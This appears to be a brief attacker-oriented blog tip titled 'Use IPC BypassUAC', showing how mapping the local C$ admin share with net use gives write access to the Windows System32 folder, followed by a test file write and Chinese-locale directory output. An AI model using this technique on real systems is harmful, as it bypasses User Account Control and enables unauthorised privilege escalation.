Use IPC BypassUAC

After the actual test, some environments can be successful
In many scenarios, you do not have write permission to the system directory. Here you will use this method to obtain write permission to the file

C:\Windows\System32>net use A: \\\c$


A:\>cd Windows\System32

A:\Windows\System32>echo test >test111

A:\Windows\System32>dir test111
 驱动器 A 中的卷没有标签。
 卷的序列号是 4C43-ED5B

 A:\Windows\System32 的目录

2021/08/08  15:01                 7 test111
               1 个文件              7 字节
               0 个目录 31,098,544,128 可用字节


Author: Yangsir
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